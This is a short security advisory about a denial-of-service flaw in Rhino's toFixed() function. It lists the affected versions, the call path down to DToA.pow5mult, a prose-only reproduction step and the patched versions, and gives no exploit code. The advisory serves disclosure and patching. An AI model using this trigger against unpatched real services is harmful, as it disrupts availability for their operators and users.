Rhino High CPU Consumption Vulnerability in toFixed() Function Leading to Denial-of-Service

A denial-of-service vulnerability has been identified in Rhino, an open-source JavaScript implementation in Java, affecting versions prior to 1.8.1, 1.7.15.1, and 1.7.14.1. The issue arises when an application passes an attacker-controlled floating-point number to the toFixed() function, potentially causing excessive CPU usage. This high CPU consumption can disrupt normal application performance, leading to a denial-of-service condition. The vulnerability is rooted in the way small numbers are processed, where the call stack includes NativeNumber.numTo, DToA.JS_dtostr, DToA.JS_dtoa, and DToA.pow5mult. The pow5mult function attempts to raise 5 to an extremely high power, causing the CPU to become overloaded.

Impact

Exploitation of this vulnerability can lead to significant CPU resource consumption, causing a denial-of-service condition where the application becomes unresponsive or slow.

Reproduction

To reproduce this vulnerability, pass a small, attacker-controlled floating-point number to the toFixed() function. The number will be processed through a series of internal functions, ultimately causing high CPU usage as the pow5mult function raises 5 to an excessive power.

Remediation

Users can upgrade to Rhino versions 1.8.1, 1.7.15.1, or 1.7.14.1 to address this vulnerability.